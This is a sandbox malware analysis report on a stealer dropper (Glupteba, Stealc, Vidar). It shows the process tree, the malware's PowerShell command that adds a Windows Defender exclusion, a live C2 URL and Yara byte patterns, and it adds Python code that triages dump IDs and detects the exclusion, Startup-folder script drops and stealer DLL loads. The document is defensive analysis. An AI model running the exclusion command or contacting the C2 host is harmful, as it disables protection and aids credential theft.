
Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1407460
MD5:e533f92146fcacb8caca823882b8d304
SHA1:fcb2b79d08e2fb7a58142faf7db2a36f142b309d
SHA256:3cf0b82b4b91ac001ede7dfe7736f42e2a5e1bd9cc6da34393ec9e18ec81a9fe
Tags:exe

Detection

Glupteba, Mars Stealer, Socks5Systemz, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Glupteba
Yara detected Mars stealer
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected Vidar stealer
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Creates HTML files with .exe extension (expired dropper behavior)
Disables UAC (registry)
Drops script or batch files to the startup folder
Found Tor onion address
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes many files with high entropy
Writes to foreign memory regions
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Stores files to the Windows start menu directory
Stores large binary data to the registry
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

(classification graphic not included)

Process Tree

  • System is w10x64
  • file.exe (PID: 7564 cmdline: C:\Users\user\Desktop\file.exe MD5: E533F92146FCACB8CACA823882B8D304)
    • powershell.exe (PID: 44284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 44312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 44808 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • InstallUtil.exe (PID: 44324 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • fwUkFVOLVOFs3NY104r7giRJ.exe (PID: 44800 cmdline: "C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
        • fwUkFVOLVOFs3NY104r7giRJ.tmp (PID: 44904 cmdline: "C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp" /SL5="$104B0,1807550,56832,C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe" MD5: 1C1FD0B05187F81F28F910EB5B511E12)
          • weblinkanalyzer.exe (PID: 45024 cmdline: "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i MD5: B0E9D3290621648878CA0D486C60F951)
          • weblinkanalyzer.exe (PID: 7312 cmdline: "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s MD5: B0E9D3290621648878CA0D486C60F951)
      • 7g1UcaWDIadEWTPuXfBgjhjE.exe (PID: 45016 cmdline: "C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
        • syncUpd.exe (PID: 44208 cmdline: C:\Users\user\AppData\Local\Temp\syncUpd.exe MD5: 220CB1B1688C2364B9AB272E37B896F3)
        • BroomSetup.exe (PID: 7220 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: EEE5DDCFFBED16222CAC0A1B4E2E466E)
          • cmd.exe (PID: 11968 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 12152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 0rb7lvvnt87bG7IAtAszCDpT.exe (PID: 44200 cmdline: "C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • DAOYzG6VUKOTbMmRBP4iG9FF.exe (PID: 8028 cmdline: "C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
        • DAOYzG6VUKOTbMmRBP4iG9FF.tmp (PID: 3548 cmdline: "C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp" /SL5="$504EC,1807550,56832,C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe" MD5: 1C1FD0B05187F81F28F910EB5B511E12)
      • trvViErxBCFce9vUUZnny6xg.exe (PID: 7364 cmdline: "C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • MX6OxFuxXLJNkbD9F2dPLyyC.exe (PID: 8612 cmdline: "C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0 MD5: 61ACBBC8CAEF6EB5C8D4CBDE2EEC2312)
        • MX6OxFuxXLJNkbD9F2dPLyyC.exe (PID: 9404 cmdline: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0 MD5: 61ACBBC8CAEF6EB5C8D4CBDE2EEC2312)
        • MX6OxFuxXLJNkbD9F2dPLyyC.exe (PID: 11284 cmdline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --version MD5: 61ACBBC8CAEF6EB5C8D4CBDE2EEC2312)
      • 363PwSZXj46RramHioCvzZ7q.exe (PID: 8628 cmdline: "C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • aKsTqJOcX9LAZThGesUnxmZk.exe (PID: 9792 cmdline: "C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • 51fuIpAxuIxVSFNlFyLCdDUf.exe (PID: 9972 cmdline: "C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0 MD5: B4CEF398C7001044330BE058549F9DE3)
        • 51fuIpAxuIxVSFNlFyLCdDUf.exe (PID: 11096 cmdline: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0 MD5: B4CEF398C7001044330BE058549F9DE3)
      • jBpaTqUJP0LUZLvKSUzQoPLO.exe (PID: 10472 cmdline: "C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • FnzHBAPEbvEEx8ZWWEvo0R6a.exe (PID: 10744 cmdline: "C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
        • FnzHBAPEbvEEx8ZWWEvo0R6a.tmp (PID: 12864 cmdline: "C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp" /SL5="$30596,1807550,56832,C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe" MD5: 1C1FD0B05187F81F28F910EB5B511E12)
      • YeDvL2xULnFqNNxNLIvjO2b6.exe (PID: 10820 cmdline: "C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • mlSjlt4YcfcpuVp4aQsoCouK.exe (PID: 11316 cmdline: "C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
      • f68SQOWBvY0lqnWRcqakARDI.exe (PID: 11704 cmdline: "C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe" MD5: F0A6999F1BC47C6C468CF6DB95003AD5)
      • 8aNg0kr81H7icHssfXxzSpJA.exe (PID: 11804 cmdline: "C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0 MD5: 95F97B76DCB43201CEBCFACE99D5C36C)
        • 8aNg0kr81H7icHssfXxzSpJA.exe (PID: 13620 cmdline: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0 MD5: 95F97B76DCB43201CEBCFACE99D5C36C)
      • IelNhfi6M4d6yMRgQg9Svn6Z.exe (PID: 11920 cmdline: "C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • uOoBNdE6Sm5DmPd13osCbhQm.exe (PID: 12024 cmdline: "C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
      • 23jzBT2gZ2W4aFsNb8WtTEfu.exe (PID: 13308 cmdline: "C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe" MD5: F0A6999F1BC47C6C468CF6DB95003AD5)
      • 1EkTthwf6man8aNjDkP3iYby.exe (PID: 13384 cmdline: "C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0 MD5: AAFB0357588673B1DB5973DFF4616B8F)
    • WerFault.exe (PID: 44592 cmdline: C:\Windows\system32\WerFault.exe -u -p 7564 -s 73500 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7656 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 44436 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 44516 cmdline: C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Malware Configuration

Name: Glupteba
Description: Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a fork of the Arkei stealer. It appears to be one of the first stealers that also grabs information from 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Extracted configuration (both extractions point at the same C2 endpoint):
Stealc: {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
Vidar: {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
Yara Overview

Dropped Files (Source | Rule | Description | Author):
C:\Users\user\AppData\Local\Web Link Analyzer\is-5KR53.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Memory Dumps (Source | Rule | Description | Author | Strings):
00000011.00000002.3181473452.0000000000703000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  0xd38:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000015.00000000.2055445939.0000000000401000.00000020.00000001.01000000.00000011.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000015.00000002.3188674818.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
(22 further entries not shown)

Unpacked PEs (Source | Rule | Description | Author):
17.2.syncUpd.exe.6a0e67.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
17.2.syncUpd.exe.6a0e67.1.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
8.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
17.2.syncUpd.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
17.2.syncUpd.exe.400000.0.raw.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
(16 further entries not shown)
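The memory-dump identifiers above are the only link between a Yara or config-extractor hit and a process in the process tree. The following is an added example, not code from the Joe Sandbox report or from Joe Security, that parses those identifiers and groups the hits per process. The field layout is inferred from the identifiers on this page and should be treated as an assumption except where the page itself confirms it: field 1 (hex) is the per-analysis process index, the same number that prefixes the unpack IDs ("17.2.syncUpd.exe...") and the code-function IDs ("17_2_..."); field 2 is the dump pass (the ".2" in those IDs); field 4 is the region base address; fields 5 and 7 match the Windows PAGE_* protection and MEM_* type constants. Fields 3, 6 and 8 are carried through undecoded, and the process-index table is read off this page.

```python
"""Added example, not code from the Joe Sandbox report or from Joe Security:
parses the memory-dump identifiers (....sdmp) named by the Yara and
config-extractor hits so each hit can be tied back to a process in the
process tree and to the kind of memory it was found in.

Field layout is inferred from this page (an assumption except where the page
confirms it): field 1 (hex) = process index, field 2 = dump pass, field 4 =
region base, field 5 = PAGE_* protection, field 7 = MEM_* type."""
from dataclasses import dataclass

PAGE_PROTECT = {0x01: "NOACCESS", 0x02: "R", 0x04: "RW", 0x08: "WC",
                0x10: "X", 0x20: "RX", 0x40: "RWX", 0x80: "WCX"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Process index -> image name, read off this page's unpack and code-function IDs.
PROCESS_INDEX = {
    8: "InstallUtil.exe", 14: "fwUkFVOLVOFs3NY104r7giRJ.tmp",
    16: "weblinkanalyzer.exe", 17: "syncUpd.exe", 21: "weblinkanalyzer.exe",
    35: "f68SQOWBvY0lqnWRcqakARDI.exe", 42: "23jzBT2gZ2W4aFsNb8WtTEfu.exe",
}


@dataclass(frozen=True)
class Dump:
    process_index: int
    pass_no: int
    dump_id: int        # 10-digit counter, left undecoded
    base: int
    protect: int
    field6: int         # undecoded
    mem_type: int
    module_index: int   # assumption: module slot for MEM_IMAGE dumps, 0 otherwise

    @property
    def process(self) -> str:
        return PROCESS_INDEX.get(self.process_index, f"<process index {self.process_index}>")

    @property
    def protect_name(self) -> str:
        # Mask off PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE modifier bits.
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def is_rwx_private(self) -> bool:
        """Writable and executable private memory: where unpacked or injected code lives."""
        return (self.protect & 0xFF) == 0x40 and self.mem_type == 0x20000

    @property
    def unpack_prefix(self) -> str:
        """The "<index>.<pass>.<image>" prefix the report uses for unpack IDs."""
        return f"{self.process_index}.{self.pass_no}.{self.process}"


def parse_dump_name(name: str) -> Dump:
    stem = name[:-5] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    if len(parts) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(parts)}: {name!r}")
    # Field 3 is all decimal digits on this page; every other field is hex.
    return Dump(*[int(p, 10 if i == 2 else 16) for i, p in enumerate(parts)])


def triage(hits: list) -> dict:
    """Group (dump name, rule) hits by process; collect RWX private regions per process."""
    out = {}
    for name, rule in hits:
        d = parse_dump_name(name)
        entry = out.setdefault(d.process, {"index": d.process_index, "rules": set(), "rwx_private": []})
        entry["rules"].add(rule)
        if d.is_rwx_private and d.base not in entry["rwx_private"]:
            entry["rwx_private"].append(d.base)
    return out


# Hits copied from the Memory Dumps table above.
HITS = [
    ("00000011.00000002.3181473452.0000000000703000.00000040.00000020.00020000.00000000.sdmp",
     "Windows_Trojan_RedLineStealer_ed346e4c"),
    ("00000015.00000000.2055445939.0000000000401000.00000020.00000001.01000000.00000011.sdmp",
     "JoeSecurity_DelphiSystemParamCount"),
    ("00000015.00000002.3188674818.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp",
     "JoeSecurity_Socks5Systemz"),
    ("00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp",
     "JoeSecurity_Stealc"),
    ("0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp",
     "Windows_Trojan_Smokeloader_3687686f"),
]

if __name__ == "__main__":
    for proc, info in triage(HITS).items():
        regions = ", ".join(hex(b) for b in info["rwx_private"]) or "none"
        print(f"[{info['index']:>2}] {proc}: {sorted(info['rules'])}; RWX private: {regions}")
```

Run against the five hits on this page, the Stealc rule and the RedLine signature both resolve to process 17, which the process tree shows as syncUpd.exe under 7g1UcaWDIadEWTPuXfBgjhjE.exe, and the Socks5Systemz hit resolves to process 21, weblinkanalyzer.exe. The RWX private region at 0x703000 in syncUpd.exe is the first thing to pull for static analysis: a private allocation that is both writable and executable is where unpacked or injected code ends up, which is also what the "Detected unpacking" and "Writes to foreign memory regions" signatures describe.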

System Summary

Source: Process started | Authors: Florian Roth (Nextron Systems) (two rules) and Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). All three rules matched the same process-creation event; the two Nextron rules are the ones the signature list reports as "Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet" and "Sigma detected: Powershell Defender Exclusion".
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
  CommandLine|base64offset|contains: ~2yzw
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: C:\Users\user\Desktop\file.exe, ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7564, ParentProcessName: file.exe
  ProcessId: 44284, ProcessName: powershell.exe
Source: Process started | Author: vburov
  Command / CommandLine / ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
  CommandLine|base64offset|contains: (empty)
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\svchost.exe
  ParentCommandLine: (empty), ParentImage: (empty), ParentProcessId: 620
  ProcessId: 7656, ProcessName: svchost.exe

Data Obfuscation

Source: File created | Author: Joe Security (signature list: "Sigma detected: Drops script at startup location")
  EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 44324
  TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat

No Snort rule has matched
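The Sigma hits above (Defender exclusion added from PowerShell, script dropped into the Startup folder) and the Stealc description in the Malware Configuration section (legitimate NSS and sqlite DLLs downloaded to read browser stores) describe three behaviours worth re-detecting outside the sandbox. The following is an added example, not code from the Joe Sandbox report or from the Sigma project, that replays them over constructed Sysmon-like events. It goes beyond the page in two places, both assumptions: the Defender rule also handles a command hidden in an `-EncodedCommand` blob by reproducing the `base64offset` modifier the Sigma hit above refers to, and the nss3.dll image-load event and its path are constructed (the page only shows nss3/mozglue symbols inside syncUpd.exe). PIDs and paths in the first two events are taken from the process tree.

```python
"""Added example, not code from the Joe Sandbox report or from Joe Security:
replays the detections this report attributes to Sigma rules (Defender
exclusion added from PowerShell; script dropped into the Startup folder) and
one Stealc-style heuristic (Mozilla NSS / sqlite DLLs loaded by a non-browser
process) over constructed Sysmon-like events.  Field names follow Sysmon
(EventID 1 = process create, 7 = image load, 11 = file create)."""
import base64
import re

# Constructed events.  The first two are modelled on the report's process tree
# and Sigma hits (PIDs and paths as on the page); the nss3.dll load is an
# assumption consistent with the nss3/mozglue symbols found inside syncUpd.exe
# (the DLL path is invented); the last two are benign controls.
EVENTS = [
    {"EventID": 1, "ProcessId": 44284,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force',
     "ParentImage": r"C:\Users\user\Desktop\file.exe"},
    {"EventID": 11, "ProcessId": 44324,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows"
                       r"\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat"},
    {"EventID": 7, "ProcessId": 44208,
     "Image": r"C:\Users\user\AppData\Local\Temp\syncUpd.exe",
     "ImageLoaded": r"C:\Users\user\AppData\Local\Temp\nss3.dll"},
    {"EventID": 1, "ProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-MpPreference",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 7, "ProcessId": 101,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ImageLoaded": r"C:\Program Files\Mozilla Firefox\nss3.dll"},
]

MP_EXCLUSION = re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)",
                          re.I | re.S)
ENCODED_ARG = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
STARTUP_SCRIPT = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:bat|cmd|vbs|js|ps1)$", re.I)
# DLLs Stealc downloads to read browser stores (from the family description on this page).
STEALER_DLLS = {"nss3.dll", "mozglue.dll", "softokn3.dll", "freebl3.dll", "sqlite3.dll"}
BROWSER_DIRS = ("\\mozilla firefox\\", "\\thunderbird\\", "\\tor browser\\")


def encode_powershell_command(script: str) -> str:
    """What powershell -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def base64offset_variants(needle: str) -> set:
    """Sigma's base64offset modifier: the three base64 spellings a UTF-16LE
    string can take inside a longer base64 blob, one per 3-byte alignment.
    Leading/trailing characters that depend on neighbouring bytes are cut."""
    data = needle.encode("utf-16-le")
    lead, trail = (0, 2, 3), (0, 3, 2)
    variants = set()
    for i in range(3):
        enc = base64.b64encode(b"\x00" * i + data).decode()
        variants.add(enc[lead[i]:len(enc) - trail[(i + len(data)) % 3]])
    return variants


MP_B64 = base64offset_variants("Add-MpPreference") | base64offset_variants("Set-MpPreference")


def detect_defender_exclusion(ev: dict) -> bool:
    """Process create: powershell.exe adding a Defender exclusion, either in
    clear text or hidden in an -EncodedCommand blob."""
    if ev.get("EventID") != 1 or "powershell" not in ev.get("Image", "").lower():
        return False
    cmd = ev.get("CommandLine", "")
    if MP_EXCLUSION.search(cmd):
        return True
    m = ENCODED_ARG.search(cmd)
    return bool(m) and any(v in m.group(1) for v in MP_B64)


def detect_startup_script_drop(ev: dict) -> bool:
    """File create: a script written straight into the per-user Startup folder."""
    return ev.get("EventID") == 11 and bool(STARTUP_SCRIPT.search(ev.get("TargetFilename", "")))


def detect_nss_load_by_non_browser(ev: dict) -> bool:
    """Image load: browser-credential DLLs loaded by a process that does not
    live in a browser install directory."""
    if ev.get("EventID") != 7:
        return False
    dll = ev.get("ImageLoaded", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("Image", "").lower()
    return dll in STEALER_DLLS and not any(d in image for d in BROWSER_DIRS)


RULES = {
    "defender_exclusion_via_powershell": detect_defender_exclusion,
    "script_dropped_to_startup": detect_startup_script_drop,
    "nss_dll_loaded_by_non_browser": detect_nss_load_by_non_browser,
}


def run(events: list) -> list:
    """(rule name, ProcessId) for every event that trips a rule."""
    return [(name, ev["ProcessId"]) for ev in events for name, fn in RULES.items() if fn(ev)]


if __name__ == "__main__":
    for name, pid in run(EVENTS):
        print(f"{name}: PID {pid}")
```

The `base64offset` trick is why the Sigma hit above lists a `CommandLine|base64offset|contains` field: a string encoded inside a longer base64 blob has three possible spellings depending on its byte offset modulo 3, so the rule checks all three after trimming the characters that depend on the bytes around it. Two caveats: the match is case-sensitive on the cmdlet name, because changing the case changes the UTF-16LE bytes, and a payload that is additionally Deflate-compressed or built by string concatenation at runtime has to be caught by script-block logging rather than by the process command line.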

